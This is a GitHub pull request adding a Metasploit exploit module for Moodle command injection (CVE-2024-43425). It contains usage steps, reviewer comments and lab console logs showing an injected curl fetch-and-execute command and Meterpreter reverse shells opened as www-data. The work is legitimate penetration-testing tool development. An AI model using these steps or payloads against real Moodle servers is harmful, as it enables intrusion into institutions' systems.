Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Moodle RCE (CVE-2024-43425) Module #19430

Merged
merged 3 commits into from
Dec 6, 2024
Merged

Conversation

h4x-x0r
Copy link
Contributor

@h4x-x0r h4x-x0r commented Aug 29, 2024

This is a new module which exploits a command injection vulnerability in Moodle (CVE-2024-43425) to obtain remote code execution. By default, the application will run in the context of www-data, so only a limited shell can be obtained.

Valid credentials are required to exploit this vulnerability. Moreover, the user must be authorized to either add a new or modify an existing quiz, in order to reach the vulnerable function and trigger the bug. User roles that fall into this category include Teacher and Administrator, but might differ depending on the specific deployment and configuration.

Verification Steps

  1. Download the application from here.
  2. Deploy it by following the vendor's installation guide.
  3. Create a new course with a quiz.
  4. Create a new user (e.g., of role Teacher) and assign it to the previously created course.
  5. Authenticate as the new user, confirm that you can access the course, and can add new questions.
  6. Obtain the course ID. Can be retrieved from the URL when the course is selected (e.g., <IP>/moodle/course/view.php?id=3).
  7. Obtain the course module ID (CMID). Can be retrieved from the URL when the "Add question" button is pressed within a quiz of a course (e.g., IP>/moodle/mod/quiz/edit.php?cmid=4).
  8. Start msfconsole
  9. use exploit/linux/http/moodle_rce
  10. set USERNAME <USER>
  11. set PASSWORD <PASSWORD>
  12. set CMID <ID>
  13. set COURSEID <ID>
  14. set RHOSTS <IP>
  15. set LHOST <IP>
  16. exploit
msf6 exploit(linux/http/moodle_rce) > exploit 

[*] Started reverse TCP handler on 192.168.217.128:4444 
[*] Obtaining MoodleSession and logintoken...
[+] Server reachable.
[*] Authenticating as testuser...
[*] Successfully authenticated.
[*] Obtaining sesskey, courseContextId, and category...
[*] Injecting command...
[*] Sending stage (3045380 bytes) to 192.168.217.141
[*] Meterpreter session 1 opened (192.168.217.128:4444 -> 192.168.217.141:37152) at 2024-09-01 18:19:44 -0400
[-] Exploit aborted due to failure: unreachable: Failed to receive a reply from the server.
[*] Exploit completed, but no session was created.

msf6 exploit(linux/http/moodle_rce) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo 
Computer     : 192.168.217.141
OS           : Ubuntu 24.04 (Linux 6.8.0-41-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux

meterpreter > getuid 
Server username: www-data

Notes

Obtaining the course ID and course module ID has to be done manually by the user running the module. While it could be automated, there are too many variables to consider (multiple courses, multiple quizzes, specific configurations of these, specific permissions assigned to the given user, etc.). Since it is fairly trivial to obtain these from the address bar while browsing Moodle, it shouldn't be a big burden for the user.

I played around with different timeouts and similar properties, but the current draft of the module always results in a shell that isn't directly caught when the module is executed:

[*] Meterpreter session 1 opened (192.168.217.128:4444 -> 192.168.217.141:37152) at 2024-09-01 18:19:44 -0400
[-] Exploit aborted due to failure: unreachable: Failed to receive a reply from the server.

While it's not a big issue to manually select the session, it would be nicer if it gets caught while running the module. Is there a specific MSF directive or property I can add to make this more reliable in my module?

Currently no check method is implemented, as I didn't see an endpoint that returns the version details to an unauthenticated user.

I'm leaving it as a draft for now, as I still want to do some cleanup and improvements, as well as incorporate some of the feedback that I got in other PRs that apply here too. However, the current code should work in the majority of cases as is, in case someone would like to test it already.

end
print_good('Server reachable.')

moodlesession = res.get_cookies.scan(/MoodleSession=([^;]+)/).flatten[0]
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Would you be able use 'keep_cookies' => true instead of manually extracting moodlesession?

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

In this case I had issues getting it to work with keep_cookies, as sometimes an expected cookie was not present in the order the requests are being sent to the server, if I remember correctly.

modules/exploits/linux/http/moodle_rce.rb Outdated Show resolved Hide resolved
'mform_isexpanded_id_multitriesheader' => '0',
'mform_isexpanded_id_tagsheader' => '0',
'category' => "#{category},#{course_context_id}",
'name' => 'XXXXXXXXXXXXXXXX',
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Could this, and maybe some of the other values being sent here, be randomized?

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Yes, I used hardcoded values to get an initial PoC working. I'll see which ones I can randomize and update the code accordingly.

modules/exploits/linux/http/moodle_rce.rb Outdated Show resolved Hide resolved
@ABC20236
Copy link

ABC20236 commented Sep 7, 2024

Hello teacher, I found that the 6.4.26 version of msfconsole does not integrate this vulnerability library, where can I get this vulnerability library?

@h4x-x0r
Copy link
Contributor Author

h4x-x0r commented Sep 7, 2024

@ABC20236 It hasn't been merged yet. If you'd like to use it already, you can add it yourself by copying the files from this PR (located at https://github.com/rapid7/metasploit-framework/pull/19430/files). The module is still a draft, but should work.

@jheysel-r7 Thank you for your feedback! Hopefully I have more time in the coming days to work through your comments (as well as for the other pending PRs) and update the module(s) accordingly.

@ABC20236
Copy link

ABC20236 commented Sep 7, 2024

Teacher, thank you so much for your help, I used the file you provided to test locally, but I encountered the following problem, due to limited ability, I hope to get your help.
[] Obtaining MoodleSession and logintoken...
[+] Server reachable.
[
] Authenticating as admin...
[] Successfully authenticated.
[
] Obtaining sesskey, courseContextId, and category...
[-] Exploit failed: NoMethodError undefined method `[]' for nil:NilClass
[*] Exploit completed, but no session was created.

@h4x-x0r
Copy link
Contributor Author

h4x-x0r commented Sep 8, 2024

Thank you for reporting the bug. Can you please enter set verbose true and set HttpTrace true, run the module again, and share the output (feel free to replace any sensitive information in case you are not testing in a lab environment..)? That should help to see where exactly the issue is coming from. It might be that sesskey, courseContextId, or category is not getting an expected value.

As this module is still a draft, it has a couple issues with handling error cases, missing code optimizations, etc.

@adfoster-r7
Copy link
Contributor

As this module is still a draft, it has a couple issues with handling error cases, missing code optimizations, etc.

Awesome, let us know if you need any help getting it over the line for landing 🎉

@h4x-x0r
Copy link
Contributor Author

h4x-x0r commented Oct 29, 2024

@adfoster-r7 Thank you, I appreciate it. I'll try to provide an update this week.

@h4x-x0r
Copy link
Contributor Author

h4x-x0r commented Nov 13, 2024

Finally pushed some (minor) updates.

msf6 exploit(linux/http/moodle_rce) > exploit 

[*] Command to run on remote host: curl -so ./GQOnfyVgoWs http://192.168.217.128:8080/H6a7BpwRd2Nhhv1l5o8F3A; chmod +x ./GQOnfyVgoWs; ./GQOnfyVgoWs &
[*] Fetch handler listening on 192.168.217.128:8080
[*] HTTP server started
[*] Adding resource /H6a7BpwRd2Nhhv1l5o8F3A
[*] Started reverse TCP handler on 192.168.217.128:4444 
[*] Obtaining MoodleSession and logintoken...
[+] Server reachable.
[*] MoodleSession: pms6oji174tes157lrpbkcim9j
[*] logintoken: nQm84LJ6zIrNVBRQeZzyW5yTwIaXQMZJ
[*] Authenticating as newuser2...
[*] MoodleSession: cjbnqi58dakck8rs7p85a78d0r
[*] MOODLEID1_: %2583%2526%25A4%251E%2500%25C6n%25C9
[*] Successfully authenticated.
[*] testsession: 4
[*] Obtaining sesskey, courseContextId, and category...
[*] Obtaining sesskey...
[*] sesskey: sXqDX1ndBb
[*] courseContextId: 23
[*] category: 10
[*] Injecting command...
[*] id value: 138
[*] Client 192.168.217.141 requested /H6a7BpwRd2Nhhv1l5o8F3A
[*] Sending payload to 192.168.217.141 (curl/8.5.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 192.168.217.141
[*] Meterpreter session 26 opened (192.168.217.128:4444 -> 192.168.217.141:50302) at 2024-11-12 22:33:35 -0500
[-] Exploit aborted due to failure: unreachable: Failed to receive a reply from the server.
[*] Exploit completed, but no session was created.
msf6 exploit(linux/http/moodle_rce) > sessions -i 26
[*] Starting interaction with 26...

meterpreter > sysinfo 
Computer     : 192.168.217.141
OS           : Ubuntu 24.04 (Linux 6.8.0-41-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid 
Server username: www-data

@adfoster-r7 If you or someone else from your team has some cycles to help get this merged, that would be great. I probably won't have much time left this year to work on modules.

@h4x-x0r h4x-x0r changed the title [Draft] Moodle RCE (CVE-2024-43425) Module Moodle RCE (CVE-2024-43425) Module Nov 13, 2024
@h4x-x0r h4x-x0r marked this pull request as ready for review November 13, 2024 03:51
@dledda-r7 dledda-r7 self-assigned this Dec 2, 2024
@dledda-r7
Copy link
Contributor

Hello @h4x-x0r, so the exploit is working fine and I think the module is well written, I noticed couple of things I would like to address with you:

running exploit we get a session but the exploit fails somehow... probably is a timing issue. I will try investigate more.

msf6 exploit(linux/http/moodle_rce) > exploit

[*] Command to run on remote host: curl -so ./aicqkdvMrXO http://172.21.111.143:8080/ikF3qxGM9VA_KWHYm5lhQw; chmod +x ./aicqkdvMrXO; ./aicqkdvMrXO &
[*] Fetch handler listening on 172.21.111.143:8080
[*] HTTP server started
[*] Adding resource /ikF3qxGM9VA_KWHYm5lhQw
[*] Started reverse TCP handler on 172.21.111.143:4444 
[*] Obtaining MoodleSession and logintoken...
[+] Server reachable.
[*] MoodleSession: s0lbo2oj5ih8b2eaujh0pebc0s
[*] logintoken: 4pCNqhxquGqjjIw5pk0Evi5wwFMOPRAw
[*] Authenticating as super-teacher...
[*] MoodleSession: eul5tamgi8jv7105lfug4jonth
[*] MOODLEID1_: %2517%25E2%25C5%253A%25AE%25A9%25BF%25D4%250E%259E%25CB%2517%25AA
[*] Successfully authenticated.
[*] testsession: 3
[*] Obtaining sesskey, courseContextId, and category...
[*] Obtaining sesskey...
[*] sesskey: MDX73vu2zd
[*] courseContextId: 14
[*] category: 2
[*] Injecting command...
[*] id value: 4
[*] Client 172.21.111.165 requested /ikF3qxGM9VA_KWHYm5lhQw
[*] Sending payload to 172.21.111.165 (curl/8.5.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 172.21.111.165
[*] Meterpreter session 4 opened (172.21.111.143:4444 -> 172.21.111.165:47306) at 2024-12-04 04:47:12 -0500

[-] Exploit aborted due to failure: unreachable: Failed to receive a reply from the server.
[*] Exploit completed, but no session was created.
msf6 exploit(linux/http/moodle_rce) > 

If we run exploit -j so we get two meterpreter sessions, probably because the command injection is executed 2 times.

msf6 exploit(linux/http/moodle_rce) > exploit -j

[*] Command to run on remote host: curl -so ./BdgtwqOzer http://172.21.111.143:8080/ikF3qxGM9VA_KWHYm5lhQw; chmod +x ./BdgtwqOzer; ./BdgtwqOzer &
[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
msf6 exploit(linux/http/moodle_rce) > 
[*] Fetch handler listening on 172.21.111.143:8080
[*] HTTP server started
[*] Adding resource /ikF3qxGM9VA_KWHYm5lhQw
[*] Started reverse TCP handler on 172.21.111.143:4444 
[*] Obtaining MoodleSession and logintoken...
[+] Server reachable.
[*] MoodleSession: 8sjmp70lnsfe0na8pl1vutrf77
[*] logintoken: cyZ3nMLEZj3pQGAwHQ4146KRAEz1EDE2
[*] Authenticating as super-teacher...
[*] MoodleSession: ci145os8m8tuvhhekr9rk9vj7c
[*] MOODLEID1_: %2517%25E2%25C5%253A%25AE%25A9%25BF%25D4%250E%259E%25CB%2517%25AA
[*] Successfully authenticated.
[*] testsession: 3
[*] Obtaining sesskey, courseContextId, and category...
[*] Obtaining sesskey...
[*] sesskey: U2XLvw5q6t
[*] courseContextId: 14
[*] category: 2
[*] Injecting command...
[*] id value: 5
[*] Client 172.21.111.165 requested /ikF3qxGM9VA_KWHYm5lhQw
[*] Sending payload to 172.21.111.165 (curl/8.5.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 172.21.111.165
[*] Meterpreter session 5 opened (172.21.111.143:4444 -> 172.21.111.165:34092) at 2024-12-04 04:48:51 -0500

msf6 exploit(linux/http/moodle_rce) > sessions -i -1
[*] Starting interaction with 5...

meterpreter > ls
Listing: /var/www/html/moodle/question/bank/editquestion
========================================================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100777/rwxrwxrwx  250    fil   2024-12-04 04:47:33 -0500  BdgtwqOzer
100777/rwxrwxrwx  3574   fil   2024-12-03 05:09:21 -0500  addquestion.php
100777/rwxrwxrwx  250    fil   2024-12-04 04:45:54 -0500  aicqkdvMrXO
040777/rwxrwxrwx  4096   dir   2024-12-03 05:09:21 -0500  amd
040777/rwxrwxrwx  4096   dir   2024-12-03 05:09:21 -0500  classes
040777/rwxrwxrwx  4096   dir   2024-12-03 05:09:21 -0500  db
100777/rwxrwxrwx  250    fil   2024-12-04 04:43:31 -0500  jyDPZedjci
040777/rwxrwxrwx  4096   dir   2024-12-03 05:09:21 -0500  lang
100777/rwxrwxrwx  250    fil   2024-12-04 04:44:18 -0500  qjLGNYTIzChI
100777/rwxrwxrwx  14059  fil   2024-12-03 05:09:21 -0500  question.php
040777/rwxrwxrwx  4096   dir   2024-12-03 05:09:21 -0500  templates
040777/rwxrwxrwx  4096   dir   2024-12-03 05:09:21 -0500  tests
100777/rwxrwxrwx  1148   fil   2024-12-03 05:09:21 -0500  version.php
040777/rwxrwxrwx  4096   dir   2024-12-03 05:09:21 -0500  yui

meterpreter > exit
[*] Shutting down session: 5

[*] Client 172.21.111.165 requested /ikF3qxGM9VA_KWHYm5lhQw
[*] Sending payload to 172.21.111.165 (curl/8.5.0)
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 172.21.111.165

[*] 172.21.111.165 - Meterpreter session 5 closed.  Reason: User exit
msf6 exploit(linux/http/moodle_rce) > [*] Meterpreter session 6 opened (172.21.111.143:4444 -> 172.21.111.165:44078) at 2024-12-04 04:49:06 -0500

msf6 exploit(linux/http/moodle_rce) > 
[-] Exploit aborted due to failure: unreachable: Failed to receive a reply from the server.

msf6 exploit(linux/http/moodle_rce) > sessions -i -1
[*] Starting interaction with 6...

meterpreter > ls
Listing: /var/www/html/moodle/question/bank/editquestion
========================================================

Mode              Size   Type  Last modified              Name
----              ----   ----  -------------              ----
100777/rwxrwxrwx  250    fil   2024-12-04 04:47:49 -0500  BdgtwqOzer
100777/rwxrwxrwx  3574   fil   2024-12-03 05:09:21 -0500  addquestion.php
100777/rwxrwxrwx  250    fil   2024-12-04 04:45:54 -0500  aicqkdvMrXO
040777/rwxrwxrwx  4096   dir   2024-12-03 05:09:21 -0500  amd
040777/rwxrwxrwx  4096   dir   2024-12-03 05:09:21 -0500  classes
040777/rwxrwxrwx  4096   dir   2024-12-03 05:09:21 -0500  db
100777/rwxrwxrwx  250    fil   2024-12-04 04:43:31 -0500  jyDPZedjci
040777/rwxrwxrwx  4096   dir   2024-12-03 05:09:21 -0500  lang
100777/rwxrwxrwx  250    fil   2024-12-04 04:44:18 -0500  qjLGNYTIzChI
100777/rwxrwxrwx  14059  fil   2024-12-03 05:09:21 -0500  question.php
040777/rwxrwxrwx  4096   dir   2024-12-03 05:09:21 -0500  templates
040777/rwxrwxrwx  4096   dir   2024-12-03 05:09:21 -0500  tests
100777/rwxrwxrwx  1148   fil   2024-12-03 05:09:21 -0500  version.php
040777/rwxrwxrwx  4096   dir   2024-12-03 05:09:21 -0500  yui

@h4x-x0r
Copy link
Contributor Author

h4x-x0r commented Dec 4, 2024

Thank you for testing and reviewing the module, @dledda-r7! If you do find out how to better catch the incoming meterpreter session, please do let me know, as I encountered the same issue in a couple other modules I've been working on.

@dledda-r7
Copy link
Contributor

dledda-r7 commented Dec 4, 2024

Thank you for testing and reviewing the module, @dledda-r7! If you do find out how to better catch the incoming meterpreter session, please do let me know, as I encountered the same issue in a couple other modules I've been working on.

Regarding the first issue I am gonna try to add a timeout in the request that hang to see if we can get the session without displaying the "no session created". Regarding the second issue I wouldn't really bother myself... looks like the command is executed two times from moodle side and i don't think is a blocker, two session is better than zero 😂

Copy link
Contributor

@dledda-r7 dledda-r7 left a comment

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

The module looks good! thanks @h4x-x0r!

msf6 exploit(linux/http/moodle_rce) > exploit

[*] Started reverse TCP handler on 172.30.50.186:4444 
[*] Obtaining MoodleSession and logintoken...
[+] Server reachable.
[*] Authenticating as super-teacher...
[*] Successfully authenticated.
[*] Obtaining sesskey, courseContextId, and category...
[*] Injecting command...
[*] Sending stage (3045380 bytes) to 172.30.56.159
[*] Meterpreter session 6 opened (172.30.50.186:4444 -> 172.30.56.159:42412) at 2024-12-05 04:29:47 -0500
[*] Sending stage (3045380 bytes) to 172.30.56.159
[*] Meterpreter session 7 opened (172.30.50.186:4444 -> 172.30.56.159:42426) at 2024-12-05 04:29:47 -0500

meterpreter > sysinfo
Computer     : 172.30.56.159
OS           : Ubuntu 24.04 (Linux 6.8.0-49-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter > getuid
Server username: www-data
meterpreter > 

modules/exploits/linux/http/moodle_rce.rb Show resolved Hide resolved
@dledda-r7 dledda-r7 added the rn-modules release notes for new or majorly enhanced modules label Dec 5, 2024
@dledda-r7 dledda-r7 merged commit be30a06 into rapid7:master Dec 6, 2024
40 checks passed
@dledda-r7
Copy link
Contributor

dledda-r7 commented Dec 6, 2024

Release Notes

This adds an exploit module for Moodle learning platform. The module exploits a command injection vulnerability in Moodle CVE-2024-43425 to obtain remote code execution. By default, the application will run in the context of www-data, so only a limited shell can be obtained.

@h4x-x0r
Copy link
Contributor Author

h4x-x0r commented Dec 6, 2024

Awesome, thank you!

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
docs module rn-modules release notes for new or majorly enhanced modules
Projects
Archived in project
Development

Successfully merging this pull request may close these issues.

5 participants